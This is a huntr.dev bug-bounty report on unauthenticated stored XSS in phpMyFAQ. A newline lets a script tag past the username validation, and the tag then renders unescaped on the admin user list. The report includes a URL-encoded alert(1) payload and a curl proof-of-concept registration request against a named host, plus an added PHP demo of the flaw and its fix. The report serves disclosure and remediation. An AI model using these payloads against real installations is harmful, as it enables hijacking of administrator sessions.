huntr report 5944F154-C0AB-4547-9D9D-3101E86EB975 (ugniusv)

Unauthenticated stored XSS via username & name parameters

2022-11-03 21:48:40
ugniusv
www.huntr.dev
Tags: stored xss, unauthenticated, vulnerability, sanitization, username, name, database, dom, injection, attack, payload, url encoded, filter, poc, request

There is a stored XSS vulnerability due to improper sanitization of usernames. The vulnerable code is in User.php at line 532:

    public function isValidLogin(string $login): bool
    {
        $login = (string)$login;

        if (strlen($login) < $this->loginMinLength || !preg_match($this->validUsername, $login)) {
            $this->errors[] = self::ERROR_USER_LOGIN_INVALID;

            return false;
        }

        return true;
    }

This code filters the $login parameter only loosely because of how preg_match is used: the regular expression validates only the first line of the user input, so any content after a newline is not validated at all. This means that <script>alert(1)</script> is rejected as a username, while pwn\n<script>alert(1)</script> (pwn, a newline, then the script tag) is accepted as a perfectly valid username. In URL-encoded form: pwn%0A%3Cscript%3Ealert(1)%3C/script%3E.

Because of this, an attacker can supply URL-encoded XSS payloads that bypass the filter, such as:

realname=pwn%0A%3Cscript%3Ealert(1)%3C/script%3E&name=pwn%0A%3Cscript%3Ealert(1)%3C/script%3

The user with the malicious username is then inserted into the database.
Finally, whenever an admin user visits the “List User page”, e.g. https://172-105-72-245.ip.linodeusercontent.com/phpmyfaq/admin/?action=user&user_action=listallusers, the admin/user.php file is executed and the attacker-supplied input is interpolated into the DOM without any sanitization: <td><?= $user->getLogin() ?></td>
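The following added example (written for this report; it is not phpMyFAQ's own code) reproduces both halves of the bug described above on a self-contained basis: a username check whose regular expression is anchored per line, so only the first line of the input is validated, next to a check anchored to the whole string, and an output helper that escapes the login before it reaches HTML. The pattern, the minimum length, and the function names are assumptions for illustration; the project's actual $validUsername value is not shown on this page.

```php
<?php
// Added example, not phpMyFAQ code. The patterns and constants below are
// assumptions made for illustration; the project's real values are not on the page.
declare(strict_types=1);

// Weak check (assumed shape): with the /m modifier, '^' and '$' match at line
// boundaries, so it is enough for ONE line of the input to satisfy the pattern.
// Even without /m, '$' still matches just before a single trailing "\n".
const WEAK_USERNAME_PATTERN   = '/^[a-z0-9][\w.\-@]+$/im';

// Hardened check: \A and \z anchor to the absolute start and end of the
// subject, so a newline anywhere in the string makes the match fail.
const STRICT_USERNAME_PATTERN = '/\A[a-z0-9][\w.\-@]+\z/i';

const LOGIN_MIN_LENGTH = 2;   // assumed value

// Mirrors the structure of isValidLogin() from the report, with the weak pattern.
function isValidLoginWeak(string $login): bool
{
    return strlen($login) >= LOGIN_MIN_LENGTH
        && preg_match(WEAK_USERNAME_PATTERN, $login) === 1;
}

// Same check with whole-string anchoring.
function isValidLoginStrict(string $login): bool
{
    return strlen($login) >= LOGIN_MIN_LENGTH
        && preg_match(STRICT_USERNAME_PATTERN, $login) === 1;
}

// Output-side defence: escape on the way into HTML regardless of what the
// validator accepted. This is what the <td><?= $user->getLogin() ?></td> sink lacks.
function renderLoginCell(string $login): string
{
    return '<td>' . htmlspecialchars($login, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</td>';
}

// Constructed test inputs.
$cases = [
    'pwn',                              // ordinary username
    '<script>alert(1)</script>',        // rejected by both checks
    "pwn\n<script>alert(1)</script>",   // the bypass described in the report
    "pwn\n",                            // trailing newline: passes '$' even without /m
];

foreach ($cases as $login) {
    printf("%-40s weak=%-6s strict=%s\n",
        json_encode($login),
        isValidLoginWeak($login) ? 'accept' : 'reject',
        isValidLoginStrict($login) ? 'accept' : 'reject');
}

// The escaped cell renders the payload as literal text instead of markup.
echo renderLoginCell("pwn\n<script>alert(1)</script>"), "\n";
```

Run it with the PHP CLI (php example.php). The weak check accepts the two inputs containing a newline and the strict check rejects them; the rendered cell shows the script tag entity-encoded. Both changes are worth applying: whole-string anchoring closes the bypass at the input side, and escaping at the output side protects the admin page even if a bad value reaches the database by some other route.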

PoC:
Issue the following request to create a user with the username pwn\n<script>alert(1)</script>:

curl -i -s -k -X $'POST' \
    -H $'Host: 172-105-72-245.ip.linodeusercontent.com' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:106.0) Gecko/20100101 Firefox/106.0' -H $'Accept: application/json, text/javascript, */*; q=0.01' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Content-Length: 137' -H $'Connection: close' \
    --data-binary $'lang=en&realname=pwn%0A%3Cscript%3Ealert(1)%3C/script%3E&name=pwn%0A%3Cscript%3Ealert(1)%3C/script%3E&email=kali%40kali.com&is_visible=on' \
    $'https://172-105-72-245.ip.linodeusercontent.com/phpmyfaq/ajaxservice.php?action=saveregistration'

Now visit the “List all users page”: https://172-105-72-245.ip.linodeusercontent.com/phpmyfaq/admin/?action=user&user_action=listallusers

The XSS payload will be triggered.

Please see the occurrences section for a second unauthenticated stored XSS vulnerability via the name parameter.